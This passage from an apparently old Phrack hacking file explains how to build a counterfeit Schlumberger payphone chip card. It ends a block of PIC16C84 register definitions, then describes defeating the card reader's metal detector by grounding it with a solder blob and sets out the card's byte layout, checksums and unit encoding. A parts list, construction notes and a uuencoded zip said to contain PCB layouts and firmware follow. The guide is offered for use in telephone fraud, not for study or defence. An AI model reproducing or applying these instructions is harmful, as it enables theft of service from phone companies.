  9027. GIE             equ     0x007   ; Global Interrupt Enable
  9028.  
  9029. ; OPTION Register (f81) Bits
  9030.  
  9031. PS0             equ     0x000   ; Prescaler Bit 0
  9032. PS1             equ     0x001   ; Prescaler Bit 1
  9033. PS2             equ     0x002   ; Prescaler Bit 2
  9034. PSA             equ     0x003   ; Prescaler Assignment Bit
  9035. RTE             equ     0x004   ; RTCC Signal Edge Select
  9036. RTS             equ     0x005   ; RTCC Signal Source Select
  9037. INTEDG          equ     0x006   ; Interrupt Edge Select
  9038. RBPU            equ     0x007   ; Port B Pull-up Enable
  9039.  
  9040. ; ADCON0 Register (f08) Bits
  9041.  
  9042. ADON            equ     0x000   ; A/D Converter Power Switch
  9043. ADIF            equ     0x001   ; A/D Conversion Interrupt Flag
  9044. ADGO            equ     0x002   ; A/D Conversion Start Flag
  9045. CHS0            equ     0x003   ; A/D Converter Channel Select 0
  9046. CHS1            equ     0x004   ; A/D Converter Channel Select 1
  9047. ADCS0           equ     0x006   ; A/D Conversion Clock Select 0
  9048. ADCS1           equ     0x007   ; A/D Conversion Clock Select 0
  9049.  
  9050. ; ADCON1 Register (f88) Bits
  9051.  
  9052. PCFG0           equ     0x000   ; RA0-RA3 Configuration Bit 0
  9053. PCFG1           equ     0x001   ; RA0-RA3 Configuration Bit 0
  9054.  
  9055. ; EECON1 Register (f88) Bits
  9056.  
  9057. RD              equ     0x000   ; PIC16C84 EEPROM Read Data Flag
  9058. WR              equ     0x001   ; PIC16C84 EEPROM Write Data Flag
  9059. WREN            equ     0x002   ; PIC16C84 EEPROM Write Enable Flag
  9060. WRERR           equ     0x003   ; PIC16C84 EEPROM Write Error Flag
  9061. EEIF            equ     0x004   ; PIC16C84 EEPROM Interrupt Flag
  9062.  
  9063. ; Some useful macros...
  9064.  
  9065. PUSH    macro
  9066.     movwf   TEMP_W
  9067.     swapf   STATUS,W
  9068.     movwf   TEMP_S
  9069.     endm
  9070.  
  9071. POP     macro
  9072.     swapf   TEMP_S,W
  9073.     movwf   STATUS
  9074.     swapf   TEMP_W
  9075.     swapf   TEMP_W,W
  9076.     endm
  9077.  
  9078.     END
  9079.  
  9080. ==============================================================================
  9081. <End of PICREG.EQU>.
  9082.  
  9083. The Security System:
  9084. ~~~~~~~~~~~~~~~~~~~~
  9085. The security of the Schlumberger card system depends strongly on two
  9086. things: the metal detector in the card reader which senses if there is
  9087. any metal on the card where there shouldn't be any metal. Circuit traces
  9088. on a home built card is definitively made of metal. So, we have to
  9089. figure out a way of getting around this problem... Well, that isn't
  9090. really too hard! They made one really big mistake: If the metal detector
  9091. is grounded, it doesn't work!! If you look at the printout of my layouts
  9092. for this card you'll find one big area of the board that is rectangle
  9093. shaped. In this area you should make a big blob of solder that is
  9094. between 2-3 millimeters high (approximately!). When the card slides into
  9095. the phone, the blob should be touching the metal detector and since the
  9096. blob is connected to ground the detector is also being grounded. The
  9097. phone also counts the number of times the metal detector gets triggered
  9098. by foreign objects in the card reader (Meaning that the phone companies
  9099. security staff can see if someone's attempting to use a fake card that
  9100. doesn't have this counter-measure on it!) and this is of course included
  9101. in the daily service report the phone sends to the central computer.
  9102.  
  9103. The second security lies in the cards first 12 bytes, it's not just what
  9104. it appears to be: a serial number, it's more than that. Part of the
  9105. first byte is a checksum of the number of 1's in the 11 bytes following
  9106. it. Then byte 2 is always $83, identifying the card as an electronic
  9107. phonecard. Byte 3 and 4 is the number of units on the card: The first
  9108. nibble of byte 3 is always $1 and then in the remaining three nibbles
  9109. the number of units is stored in BCD code, for example $11,$22 means 120
  9110. units (Two units is always fused at the factory as a test, see the text
  9111. by Stephane Bausson!) Then we have 4 bytes of card serial number data, 2
  9112. bytes of card checksum (calculated with a 16 bit key stored in the
  9113. payphone's ROM), 1 byte that is always $11, and then at last, byte 12
  9114. which is the country identifier.
  9115.  
  9116. The Parts Needed:
  9117. ~~~~~~~~~~~~~~~~~
  9118.     01 * PIC16C84, 4 MHz version, Surface Mounted (SOIC-18 Package)
  9119.     01 * 4 MHz Ceramic Resonator, Surface Mounted
  9120.     02 * 22 pF Capacitors, Surface Mounted (Size 1206).
  9121.     01 * 0.8mm thick single sided circuit board with P20 photoresist
  9122.  
  9123. The Construction:
  9124. ~~~~~~~~~~~~~~~~~
  9125. Since this project is obviously not intended for the novice in
  9126. electronics I will not go into the basic details of soldering/etching
  9127. circuit boards. If you do not know much of this, ask a friend who does
  9128. for help. If you want to reach me for help, write to Phrack and ask them
  9129. to forward the letter to me as I wish to remain anonymous - This project
  9130. will probably upset a lot of phone companies and last but not least the
  9131. guys at Schlumberger Tech.
  9132.  
  9133. The UUEncoded Part:
  9134. ~~~~~~~~~~~~~~~~~~~
  9135. In this part of the phile you will find circuit board layouts for Tango
  9136. PCB as well as HP LaserJet binary files which will output the layout
  9137. when printed from DOS with the PRINT command.
  9138.  
  9139. You will also find another version of the source code to use if your PIC
  9140. programmer can't handle the programming of the 64 byte Data EEPROM
  9141. array.
  9142.  
  9143. <UUEncoded Part Begins Here>.
  9144. ------------------------------------------------------------------------------
  9145.  
  9146. section 1 of uuencode 5.22 of file telecard.zip    by R.E.M.
  9147.  
  9148. begin 644 telecard.zip
  9149. M4$L#!!0````(``Q2,!V^G@!LQ@@``.P@```,````5$5,14-21#$N05--Q5G=
  9150. M<YLZ%G].9O(_G/1VM@_K9L%)D^YD^D`P2;GKV%[LW.P^=620;6TQ4!!QT[]^
  9151. M]8%``NQMLYU;SV0RH//3^=#Y%"?'1PM_,?8`X)4_G\+5>_L2YL])N,G3)"T+
  9152. MN,?;-'\&%^41>-LR1C3-7S'4V)\O&`AF'V:^:U^Z[R\&$'SXZ/V+K?D3=_PP
  9153. M\N`56PJ\NS/OGP\,<G)\#8H6_+]-8482<(J"K),M3BB,24$YE1N,/KGC?X#Z
  9154. MX2^E^&]5S]<0W%CP5PB<"_@@!7/C-/PLD:.%<PCI6`HS0A3!M*19224RD`H9
  9155. M2%OC:2MD@`M,!S!.=V^=D)(G+/&/'G3P5QK^2N$?<T+Q6R]!RQ@/X".I=S$L
  9156. M%#CWC-.:&07GFID*92)_U&5G?;6L4+";;U%.0\[-'PW`'L+RF6*&O7V8NY-%
  9157. M+])^+Y"W98$C*!-""PC3,F'L3XYO_,5>V-\%[(;0FGH\G<YT<IT:">IQFF;@
  9158. M*GK/^W0[=NYZZ9>"WO-FP?1>6@YN8[0^.5YX]S,;^D62-EC@;9;F*'^&.67_
  9159. MUQA^LR5NN`<7[<,-)>Y\#P[OPYU+W,4>W*J-6U2X"XG[]-B+&[;Y/<(</6%P
  9160. MHBC'15%AY_W8+D]G\3!O;7!R?)3FZPHSM"RKV>L:W`W)P!^)"&*$T4XN6!?#
  9161. M@?;7W>3*V"1-5F1=YHB2-!%.5VA[W;RQY,]^8^PS\WEHZ/N(8'S[A$-F<D:X
  9162. M3FG*%_R)K[DK)_R]W&;`%DE"*$$Q^28YYVE)28(-+OYD\8?GZF"?.VJ9:8RR
  9163. MLMA`S^]:6C*O(I<K%:(XKK:]=_R);@2^LD4D85))!HT\1UF:03\'IC,3PF22
  9164. M8[HBN(^:K91Y`JL\W39L_@)AC%$.*Q%+QDE9MF7J0U%.`4G7@%6:"Q,*0<].
  9165. MCI6AE\5*T$MW&@0S2^&=,.1`)2PL4?(9;&Z7.-]%M$]D5\BV0S3<1.D:*-GR
  9166. M-'&T39_BG?`.V[:9F);UI@),9PM_.N$\SJ#`E%EP74C`CHM5+1M*<0,RPS=(
  9167. M(5V;"__57.:8PFP:+,"!1<[($<4PYD)BG=DB\.=.RX(5LPI,%?@05[O#]>9_
  9168. M<;TYP/6FE^LR_*%3L^2I"4RP<+40:4Z-O]?(.'/3&I),O&_1F?(W=#>:?41]
  9169. M,^BJVB#KUH.H6U5E`5(`HO#:"C5#>9XS"OH-5>U494&8I22IS/3CSJT@GN=.
  9170. M)_8@LV'G*MQ!@5#4BLJ:]Y#R87JN=8#1R=$M?R]TKG59]5;VV2;LKT&QB
  9171. M+AT\"-5E\"P;IMFSQJ#=$6@,JJ6#.\L4Q),>2=;5D7)LX-SK6LSU<S6UF`>:
  9172. MK_6Y@,AQM.T"%F].W.GLWTKURM0,KR5VUPE&_DB3Q)^,_#T^QMNZ3#A6Q/DM
  9173. MGRO92"*/OJN$GX0Y1@462UGMDPK05:8&[/7G"(>KXEM]+(.FS1WA"JM.K$PH
  9174. MB8'0-\(8=7U55FFXWJ6`D@C6F!U4NL6PY0H+?SA]802%1@1YGG]K9`:C)_03
  9175. M>M8.H@KX&'@3,U5(R(@4O`-_<=2I=&V)2E07"=G7\V)?=PV&9RS</95(+O%B
  9176. MK+J$EQB-KHI0UUWKVG#X&<BJVTOSC*0=K=&C2!$_DZR#)#S-;K,84QP=/"W1
  9177. MH56@"B%:OC_OL+A1"L%#S!F#<54IE5%X3],S81RPB+^")*4@YL#_\,9RB=@^
  9178. MW/]WB&@!8"0=<\CI=>.*\?Y,*.L;L[WH`"/N-SS&7ESC7+T6B.36K05W[/@.
  9179. MUX]N[='X\:6?4D/W^8:,.,TU9"0-[GRO3FO2?8`G;-4#%[JAW[UK&?H>K4D(
  9180. MDW*[9!+]9G=\Q-"><=-&2D-[OJ0S0N@@H^'_RZACLZ9/^HK#DN+VY@K0-5J5
  9181. MR0R;`5HCDIR^+`[WQ],L3]<YVLI9*$[3[)3G034PJ:16B<C^W7;BMY5OFSE0
  9182. M;#$T0K<)6T:D*(RD;OWLI'XDIS!-J^$+<UEU7*)_'C0W7K*OU"ZUX"-9;[2*
  9183. M(!KI07/1I56$7&1H4C#+[S3;3:;&G5B=]@90\((@407^4N(DQ%H&Z4X&/(.(
  9184. MMW^@N-0]NGTYHEE.+'W_O+$_DN?EDN8HI/":+8DI6&U=E,M&BH'5A]D1NA%`
  9185. MWM/6SB94Y[9-OD%CJ6&W0'S#>=JXFB33A=4OHJK\+A)MFF#8H`)>,XJZ"?^.
  9186. MAGU5QC$\<2,;L"8IM`N@'$8Z%4@IU,JH>N0)X^L!H8I7==_0^5W#/2D*7OJ=
  9187. M,.1]`"DV.!JH^PEFGP(G$:\KBC_`"URJ?57)KYJR9R"4<Y"++0?4;Q$-:K'8
  9188. M(M9/K$-L9/I+JZ7^.$41/%8N=6FU'-#N=T!&V#BM*(K2Y<`-O)%^QR5\CH@P
  9189. MQE]*%'.9))=EN`^1YK#.,6+G-P"ZP8D,;`:4A1ZQ-7Z@,@![U`]2<:$@%[C/
  9190. M%A1GD)/UAOX"7&WYE0;J6G[%2%$2-2<ZL#52)XFJ_07U8^N.1GAC5S"=@7($
  9191. M%$5[FC@G:J0Q^K9]$VS$T[JZ@:O'625.=]KDP<$QHC7LFS9UC]8OM>O\2U4*
  9192. M/M<-J]W@]AC6NFI9UNZUK*V3*V_F`3]M>S-3MXR%1\L\*KRSV)`5%3W"R3&#
  9193. M\#D5\KCQF)8Z@EJ^KQTFQBNJ3<%=4<44+#Y*28'E$,R%T,JC8KXGZ><XP\SD
  9194. M:GYF6IS*O,;55!.)$&QP7]_<:469OTQ7E>B\X9<5)]Q7_F5"-KYJM1OB/RU]
  9195. MJTRCU&QZ#_F13%.S^2*FFBRF:]6Z:(W(8V`XA[-,<PH[`4LS7'U%(,+^9V=G
  9196. MVLQWH.UI/N;]))[U'4ZG.M=7,KRZORVSSB3U_17Z;6MP_@6E61CF)75.EM\F
  9197. MU/KJG%ZB]PRD.H.ZQ_D.'M5.)IME(O,S6_2T3ZKM#)3@->)?:0?BZ/@;,1+_
  9198. M:$@J+K_F](Y.CN5=)?!J(LPU<\?MCR_RJ[&0^_3T5#*61_W5>F^;S_P[G_YL
  9199. M6>:SW:(?MNC/SUO[79C/[]Z9SY>7YO/5U6%^[R_$URUO,CHY_B]02P,$%```
  9200. M``@`2E(P'8XZ.`_+"```^!\```P```!414Q%0U)$,BY!4TW%65MSV[@5?K9G
  9201. M_!^.LYY-.Z6]I.S8[GCR0$NTPU:W4O*Z?<I`)"AA0Q$*"5IQ?GUQ(4B0E-S$
  9202. MS6PTCC0ASH=S\.'<`!X='LS]^=`#@#?^;`)7U\XES)[3<)71E!8YC/":9L_0
  9203. M1UD$WKI($*/9&XX:^K,Y!\'T_=3O.Y?]ZPL+@O<?O'_S,7_<'SX,/'C#AP+O
  9204. M_LS[UP.''!W>@)8%_[<)3$D*;IZ39;K&*8,AR9F0Z@>#C_WA/T%_\.="_MKE
  9205. M_V\@N+7A;Q"X%_!>&=9/:/A)(0=S]R6D:VO,`#$$DX)M"J:0@5I0`^D8.AV-
  9206. M#'".F05#NCUU0T:>L,(_>M#!7QGX*XU_S`C#IUZ*%@FVX`.I9FDP%+@CKFG)
  9207. M2<&905.N*?('777V%]L.I;K9&F4L%-K\@05.#Q;/#'/LW<.L/Y[O1#K7$GE7
  9208. MY#B"(B4LAY`6*5=_='CKS_?"_BYAMX15TL/)9&J*F])(2@\IW4!?RWO>Q[NA
  9209. M>[]3?B'E/6\:3$:*.;A+T/+H<.Z-I@[L-DEQ,,?K#<U0]@PSQG^7&'YQ%*ZW
  9210. M!Q?MP_44[GP/#N_#G2O<Q1Y<O`]WH7`?'W?B>FU]CS!#3QC<*,IPGI?8V6YL
  9211. M1^?<G3_,6A,<'1[0;%EB>K9MUW/=0']%-N`/9`1QP6BK!NR+GF7\ZTYRU9B$
  9212. MIC%9%AEBA*;2Z7)CKMNWMOHX;]OS.$UC?.%"*4I4/)=^4B:MO_15`,BQX[^*
  9213. M^1>@B;AV+/XM;/W"]8AO1S[IR2?GYTWIBPOQ]-T[\7UY*;ZOKFK,]453VC8=
  9214. M[`;N.*DK%?LJNAYD=$G_;RQOZHO(-Z$RUYP^X9#1C`LN*:-BP!_[1C0*P7\4
  9215. MZPWP0<*G)B@A7Q6Q&2T827%#BS^>_^[U.R06&T/1IN`6[_C<*$?)RL0D]BQ$
  9216. M25)..W+]L;G'8F2-2,JM4@IJ>PXV=`.[-?`U<R.:2C+,8H)W2?.1(DLASNBZ
  9217. M5O,KA`E&&<0R530<R';LYGH8RA@@Y?D0TTQ2*`T].SK41"_R6,JK:+&"J:WQ
  9218. M;A@*H#86%BC]!([@)<FV$=ME<E_:MD4L7$5T"8RL118\6-.G9"N=WW$<;J9M
  9219. MORT!D^G<GXR%CC/(,>,,+G,%V`JSRN'&H@2!G/@:*:UK:Q&?2LL,,YA.@CFX
  9220. M,,^X.&(8AL)(;"J;!_[,;3%8*BO!3(-?TNITM-[^+ZVW+VB]W:EU$7[7KMEJ
  9221. MUR0FF/>-$*EW33PWQ(3R)AM*3#YOR37MK^5N#7[LR%0JY)QS5;M%<(=T\VR0
  9222. MTJZS!BGED#ESV)Y9>;Z(-9(N`3$XX3(<&[@C0\G=+.C@2B5\R%BBY[D#4[0*
  9223. M+:;3<EE>!,^>UY],_P,@-NG[0TM#Q"QCQPH&M4K,RJ<08%1V>:IA>(TW<!+B
  9224. MK50T<,U]OE&STQ3+S0$:ZS6615&SYX\'?IN4DCW1X&VH2%F1X&CQ7/))4F5G
  9225. MEW@_#3.,<BR'%#0S`-T-J`"M#9A6V`B'<?ZU<B6K;G@'N,1J+RM21A(@[*W<
  9226. MP*H4Z9VLM=Y30&D$2[X5.5UC6(L%2Q\^?N5VAXWM]CS_KA%$C>[03]E9>\=+
  9227. MX&/@C4M@`S(@N>C%7^TB.K/9,FE7^51U^*(N5@6VX1GS_IZDK89$W=(%]36D
  9228. ML3@/S;4;_1L./P&)NUVU"!]C:QOE7)GXB6PZ2"):F?4FP0Q'+^Z6;&9*4(F0
  9229. MS=^?MUF"E%SJD"<.:U@6%4V**/\[SAHO,.+'D%(&\D3XA^C!%HC/(_Q_BX@1
  9230. M`(U$V3SN['3C4O'^[*UZ2,Z];)8BX3<R%9W8H>%ENY)RZ66MG%"=QJJDUSXK
  9231. MWL`]W[YXU_G0T-=.E(8^,?1#$OX^WU`19[B&BB3KWO>JM*;<!T1KJMO%W"3Z
  9232. MW;L6T2.T)"&,B_6"6_2+T_&1QNJY-J/W;ZQ>#)F*$'I14>__5=3AK)+UON"P
  9233. M8+@]N09T22LS68,S0$M$TN/7Q>'^>)IF=)FAM3HV))1NCD4>U&<+G=1*$_G/
  9234. M72=^6_FV/C+)*7J-T*W#E@MIB492MW]T4C]0!Q9C5;U7YK)RNV2K:=5W7ZH)
  9235. M,JZWX`-9KHR*('M.J[[R,BI")C,TR3GS6X.[\:1Q.U:E/0MR41`4*L>?"YR&
  9236. MV,@@W29:9!#Y]'>4%*9'MZ])#.;DT+>WYOLC>58L6(9"!B=\2!X8]=1YL:BM
  9237. ML&P#([KNRK7DA9I<[1G_"$K3KU`3U.O6A:\XH[6'*3'31O.BH$SK,K^*SG*%
  9238. M<CCA$J+3EJG8[,H[N5G1%1=)`D^"VP:LS@7MNJ<:YD[AT0MJ)5(SX"3G9ASH
  9239. MFE6>R#N?&QB1/!<5WPU#4?Y)OL*1I4_PG)\<IY$H)UH_P"L\J7U7*>Z:-L]`
  9240. MF-"@!EM^9UXC-J3E8$NX>;73$FXD^$N[M?PA11$\PI:P%9Q<VBV_<QI^5_LJ
  9241. MGZ;R55D+E<M!/_`&YBV0]#DBHQ=_+E`B;%):%N$^!,U@F6'$]\\"ML*IBF<.
  9242. M5/4=\3&QH2KN=BP_H/+(K0:$S^8,;R`CRQ7[";B*^=@`=9F/N2A*HWI'+<<0
  9243. M==.HG%]*/[9N,:0W=@TS%6A'0%&TIW=SH]J:1KNV[[`=B6RN[ZBJD[<VIWO(
  9244. M%,$A,+(CW'7(-#W:O-6NTB[3F??<)-:XPMU!K'W58M;9R:QCBFMO%@$_:7LS
  9245. M7VZ12(]6>51Z9[XB,9.MP=$AAXCC*61)[3&MY4AI];QRF`3'S#C\=DV5AU_Y
  9246. M5DH9K,Z^P@BC*FKE>Y)^AC>84ZZ/S7P5QRJOB67J@X@TS!I5=UM&+18/:5R:
  9247. M+OI\>3;3";E;]55";KS6:O?!?UKZUIE&+[-N.=1;,F.9]2LQW5OQM98=B]%_
  9248. M/`8-YW`7-&.PE3"ZP>5K!"+Y+TMS1W6GVZG?YOT@G=753:<Z5S<QHKJ?%IO.
  9249. M`>K;*_1IZ[S\$TJS).8U=4Z5WSK4=M4YLT3O.8>:"JH>YQMTE#,UU2Q2E9_Y
  9250. MH&>\4VUGH!0OD7A-:\FM$T_D2?A[0U)K^3F[=\#_O/'@Z/"_4$L#!!0````(
  9251. M`)M$+AW$&QM@"@4``#P7```,````5$5,14-!4D0N0C`QE9A+C]LV$,?O`?(=
  9252. M"-W;D#-\"3T4BM9)W.QZ#5N[27LI@F#1YM`'VGY^H"3%&;THRX8!P?)_R!^'
  9253. MG*&'_*'[\N=O?WUW_OK[RQ]?_OOV53RK[T&^B//+/]]>_A7[_>M777-X__CK
  9254. MN?VP>VBZ?2M4^#2O7YT_[':=D.&CE*U1>+!>V/#[_I>=0.6,4";\;)TTPIC:
  9255. M#;^]?O73TZ$56DLI(#SRNX'X;OE=QW>#PSO&=S6\FZD]`NO'YM0)[>)[A&BL
  9256. MP\.%T00YCR8-/#UE\BBT:KKN)*KNY^.N$K6H/G?-?=7WHKWL+9&L[G;G_?M#
  9257. MTSV>>EN5+8V96W[^,5E4/25^6$F`2YJ>:<?](6-4')7F;^S*I)-#\Q!<45)4
  9258. MC^<6X@@A-U"V'V+H,'@26E=-D(V/<K!1X%G/0&0@7@E4!,0B\",!<0P\[=JN
  9259. M(:8D_](JYG7='>[R`H=5#6VB$3J)`FR=S)W0$(90;Z_P<=\JVWI=]11,,W-A
  9260. ME9^"2QA#`7%N^;2ZR@-DKJ?)E>1#^@8IV@1<GMQ3$Q>S;QDFS\%\;N/41P6\
  9261. MCQV/UE(Q3MV`PXI:%G%Q-*J(`\;!#3C]YM2U;47-B\PX)"@RD9E(3+7%?&CO
  9262. MPQ+GID6>CG*1IYFGB>>V>.\/=Q6U+.),E(LXPSAS_92^E6_VAZZBUD6DC7(1
  9263. M:1EI;T#&(+3K.!?E(LXQSMV`@XI:%G$^[T9+G&><OP$7X\^OX^HH%W$I;6M*
  9264. M^!3B6N!62BA*^-B?DGJ1\3ZG?'J,=V_%/'4#3U+&K_%<SOD%#Y@']%!;O/QO
  9265. M`9>`-B?\`H@,1-YHK@`"Y?L:T.2,7P`U`S4!W1;P.>UG^A)/YY1?\`SSS/4K
  9266. M^-91MJ_Q,.?[@F>99V_@64KW-1[DA%_P'//<#3Q#^;[&H_ICP?/,\S?P-"7\
  9267. M&D_FE!_S<CDS5"JZ)OBRG*'Z5:"*]:I'%2P#W,!5]6K;'"N!QL22*CQL'*$B
  9268. MJ^?F_JDW`Q!_OR/#.*3:7BAY8IKTIG%T-GO=G%J!UKM<3((12J-P.H[J?G_8
  9269. MA2;LB\%L)D>JA:Q:LANKL84,G>:VS@SUTJAC&)IN%*--]&%2^JI9Z8LX+7U5
  9270. MIO'PTI+10"_3WD::)YK6<US4^T(<\G*6(P$I$HSD2-"W1H*Y-A)@,Q(4F>IB
  9271. M)."E2$".!"Q$`G(DS-78`C@2<!D)R)&`-T4"7HX$+$<"_]700*^,!-R(!%R+
  9272. M!%/SU(2OHQ,UNJLB87]^=#[^=::.E)67C[%/4`D+_8%J9LD'')NJ7*]F.I-&
  9273. M1HM.V*ATL$U#A'3$M/0-MA;TTZF+SD&V7QXSH^_.1WE^KNUYP#RXAM?>?R0>
  9274. M%'F.>%#F2>;):WBG,_LGBSQ//%GD(?N'?26VP;MKNB8#L>P@9""N.&C909L*
  9275. MHPU@*HQZ!VV19\A!6^9YYOEK>.GDU?-\D:>)Y\L3R@N8OFW[=SS2?)87$&D^
  9276. M5Q:0$P*O2HAW3^<=`<L9H0@XR8A<J?3[1)P9ZVCK&5<JG_:G7;ZI2_LOY#(Q
  9277. M*_T16(X/PUE)T312Y-!FJ&I-?DP4P]=X@V(T[Q7KBN7[Q;XWSCH^QBX4SDSJ
  9278. M#1<A-E'X0FRD:#U51B/`R;S!R%-6^-)B,M>3I!ISTM"+J]#/J)XJH_]+VA.6
  9279. M"N92G'I35)J7%>"SY4B!R0&PO\4=/.V5X3ZWCY!Z<;$Y428WD(NHPCG'T)[.
  9280. M]R0+A??]\:C!CJ^KELIPZ_P_4$L#!!0````(`*)$+AW[.7CW$P4````@```,
  9281. M````5$5,14-!4D0N0TU0[5A;3QM'%#Z[W@064R#@A$L2V``-A!C8F[VFBE0M
  9282. M:R=UPL6RS>4!J5()2I`01B0OE?*`JDK]#97R`_+8O%1YJ)I(;=0^]*&J^`'-
  9283. M#ZC4]Q*[Y\S,WK*_H'0/:[/S?=\9S^R<F3TSFS*X`"L`51G*%\`M`4"S"RHR
  9284. M_M<T$V2E\^[ENY?0#=7&NE,RBC`MU:J>4?1*-I"=:)IFD.S5F]_>0A\TUN\;
  9285. M)9B0MION2B"P(O4P(B<S-\8'U0T1:'+0_[4!F;DSC'E6,@AH.D>\UM&7Q_N/
  9286. M'C_59KU;FK%46LHOZ9KK>945K;FW^_BP==!ZM+_W)*]5#W<7-&-!SVOKM<H:
  9287. MM#/![X/R]^OI7R4IUR<K$FLC;&!S90FHN?5JP],JE5I]?55;W=\];NVV#I\>
  9288. MMPX.]HY!!>@Y;3_OE._D)0#\*'77A*Q!:"F&6I`U"3UM1U%[L=[T/,A:1!VU
  9289. MW8!:]5;JD+4)[FW?"^![:V7(%@A]\3Y2S[*^6%UK0K9(3#G&&)!U"/WS+(J:
  9290. MT>Y+V1(IGL44V-XEZ/E.>=Y1[IRV`?"#[<7:<&@1+L5@'6&'X-.V%,#K#8_D
  9291. M1<*/VG(4IT=4(+RWW17@F_0@#)O@%^\CM2\["%L$EV-P$6&3X#_/HG`!88/@
  9292. M9S'81EC'\9+Z`4;.OKX?=O^K#'[)@^I#J/T#%^7![KST$.B&ARO&PJ?@%[HA
  9293. M"%55DE2054F&_[SE8!#'/0.=SIRT5FE^KNN&YAO.0J]>-G9@@&8;?0'U6`)?
  9294. M:B:E.9+FDE(K*1TCZ5A2:B>EXR0=3TH+2>DD22>3TF)2.D/2F:3424KG23J?
  9295. ME):24IVD>BC-R^SFI/+)SF=NO;SEUBL[8GW;$4X0.$]E(!,L=A+^;1MTL1HN
  9296. M_O3MSP3-9*`KMG(2N&'0Q71;;[[X0>AZV#+IUI@$IQY>IJD=W66ZS1]?^_5E
  9297. M8SJ#KJCNF[>$W\Q`;W1Q9C]KTL5DW_\R^HJ@$04GVQ`)EV$9_[&XH3(C/B;"
  9298. MI;<.&RE61L*`X="#A<^P3]S\P(/*8PI._VM$.."M/,#?9W%TS:<TH@I`RTH7
  9299. M"QZ&I)8T&7['@.MT%.A3'5SC\+FIM.I!#HLJ+\;>^*FEEMHY,0G?-G^P^=_I
  9300. M9(.%$]\;B@-S=*M`CVK!1;K%-"&UU%([5S8$?^'$5OS$:9IFN@VTU^SBZ=:T
  9301. M3]TBJ@3U1A.3!I8U$W*5J$6B3"B[31>7%)8F+_INM*,_*<)6G=QTHDR?*A)E
  9302. MP6:MQA):M*)?HT.4`7<W&A40NRR'N5EPB>>#;"NI\.SRDJ`N$_4`V.Y3X6GD
  9303. M95:C`X.LP@)WD[G;H."N,*[(_23N1]@H<B.\(;2U5W@[1@0SRCM-VWO!$#*.
  9304. MS%7>KV"+K_#LE.#K2%_G3\3?N0OV.NN#`Q-\!-@A@,1SUPE!W6!ML:-I[0W1
  9305. MF"F>\$;&;4HPLSQ+IM,`A0_;K&#FQ(`N!UV;@]3^9W:%S7_*`R@D;E-(+`$=
  9306. M`8F0N"UB+\]B#Z/%-7PJ+Z@%1F&(X5F0PF?_@J`,1N%4P(,<A<]^0U`6HW#^
  9307. MX&&.J-`2E,THG'1XH",H6U`%1NE`ASJ"(FBDFY]1B!.,<#^-1"XDS!@Q%A)6
  9308. MC!@/"3M&3(9$(4;,A$0Q1LR'A!,C])`HA<2PJ@/E62>XZ]X[?K+?.@1CP=2A
  9309. M7\4G]5%T<X;E/E[VM^,<[/\`[%/Y4"*VC8X#6+P@BNR(=L!/[WP@M=122RVU
  9310. MU%)++;5S;/\"4$L#!!0````(`&M2,!W64,AT+0@````<```,````5$5,14-2
  9311. M1#$N0T]$[9B)=Q/7%<:_T6BS,<88`S88[)`V59O$C$!F20)8ED9&P9:4D80#
  9312. M66P6DZ0A"0424A*2:VP<.\ZBD(V=[FW3EG3?V^;/Z?_0<TJ_N=)(0QN?TT)[
  9313. MNO%T_(-OEC?OWO?N)\T+X-::@?_NUG)\XO#$@:,'XWW)XLA-W!^);RI.'-F:
  9314. M^)/9:L7[K`V]#OO;=VSB(/[9S40847Z:L!A!?30_U1:*;TIM2=Q4KX.US__&
  9315. M;-YN_VAKBU7_O0:S]6.,]*YOG<*UUK[6IMKYJ14'\4=K$G^VSN"Z-8.I]DGC
  9316. MC#%CM%AS/!?MF&J/1L^AQ;K`OVG,&4W1L[V"Z>:YY@N+8C%>T1Y=.M5>L>9Y
  9317. M]6QG?ZRJ5W?WQRYJ'YW16;>?Y?/+RE0?\6^V8W[E5'M_;+[3B;7QOBB?&>J8
  9318. MZ=P?,Z)7,6F4K9Z`N68\%K#.877'?%L41O0\+N$RQJWN@-DU&3,[)V.76]S/
  9319. M$NMR:$VT9?LT$+V"B'4I9':=BEU9?&G1R=B5GE";>_=,SUQLIGLN=JZYVMNX
  9320. M=3[0&3T?,+LKL>H5IR.3B<$$$DL3ZQ(;$^E$.7$H<8)J^N9*[C^JA9/I5#YG
  9321. MU<H_6M/QN@Y1%RW/'L)5'?=T!,%D>BCO=68$7)VUT;C>U9FZ-ER=S_F^/-B?
  9322. M8Q<]W83P8+:4RI5JN@M&RC=87A].)9UT-ET[<!8A:F=/XWPPM;,^7!BFZGA=
  9323. M!Q%).>FQU/`N[WK5Z5*RT3^UU[_14CWO%$O>^/7\J%V/G]I.9VOCQ20":=^`
  9324. MW>O3O@%2AVR;$?OBM>T;\EW5&VX\7_`"C+DZG:P-U[T^:-LWYILZXX_7ML<R
  9325. MP\FAJEZ-4"8Y7+0;^3(S10>^Z\.9<K&1_TY>7R[:7KI1@3G4>)P;?RB;2V<=
  9326. M7_ZSN7HVZ"X(9W.EE#?CQB+W?,GV/\_5Z:'&^*G]ZR5"/9+,UCH80;2FJQER
  9327. M]/[==JK>GYEU"O[Q18;S^8(7D+$*YG!Q$+[U%&QTSM8/<\1_/H)`KKZZJ^LC
  9328. MEQ]S\EZ$IZJZZ.G]B%1U;0+']?RHXYV?0SA?*&7K^>!Z**0R0Y:O'EP=;\1O
  9329. M%E+#\-57F#I9VEG3S0@4TK[QF;P_F^KW?,FX;JCN_RN]J:Y-U9OK.N+JS7'_
  9330. M>+*-GQ:J\XZW_&"$JGK0YP^N3C7R9Q8:Y:CKK=`HQVI\Q0WPQ4>=],<3+HRE
  9331. M\Z.Y1CT[@[[U7M49_WPZ@X6R?_X<?WY8[YP\=TE4#YR$Z11\XPNYVC<^KD=&
  9332. MD_*/URGYUG_0/>\;3TAUQA^/4RKZ^P\72\E2N=B8KY(]4G^BT5W57D:,-56]
  9333. MT=-KJ[H^'ST(NWK,ZV]]38_6=!\")?_Z#?)^)UOTSY^K_?/G:M_\!4M.V?;%
  9334. M'RJ-Y<NE1G^!4><&OPN..G;.%W^(VG$:\V7NL7WY,&#LA>]^7K]W;+!N(,:M
  9335. MOIW<;G_/&UP47>C%-@,#D8'6@24#N-W^;]JMOO\V\_O!L8?Z[(?*-W'W[?9O
  9336. M;]>5@4\^G:*LZ+Y`1=VX8BK='0A#CQMZW-#C1NUX2!E61I1199.R6;E(V:)<
  9337. MK&Q5+E&V*9<JVY7+E!W*Y<H5RI7*3F67<I5RM;);N4:Y5MFC[%7>H5RGO%/Y
